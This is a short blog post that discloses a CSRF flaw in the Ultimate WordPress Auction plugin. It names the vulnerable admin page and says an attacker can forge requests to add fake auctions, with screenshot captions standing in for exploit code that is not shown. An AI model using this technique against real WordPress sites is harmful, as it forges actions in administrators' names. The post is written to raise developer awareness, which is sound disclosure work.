Most of CMS seems vulnerable to CSRF attacks these days, Ultimate Wordpress auction plugin is really good concept, but suffering from CSRF vulnerability which when exploited, attacker may add Fake Auction Bids which obviously we don't want!!!!
Vulnerable URL:
http://127.0.0.1/wordpress-3.5.1/wordpress/wp-admin/admin.php?page=add-new-auction
Basically If you study source code closely there is no URL specified in FORM tag.
No URL Available!! |
So in such cases page is submitting FORM information to itself!!! So tried to craft CSRF exploit with same URL and worked well...
While CSRF Exploit Loading..... |
Fake Auction Added by Attacker |
I hope author will patch this soon, Aim is to make awareness about web exploitation and how it is done in practical environment, so that Application developer will be more careful while coding.
No comments:
Post a Comment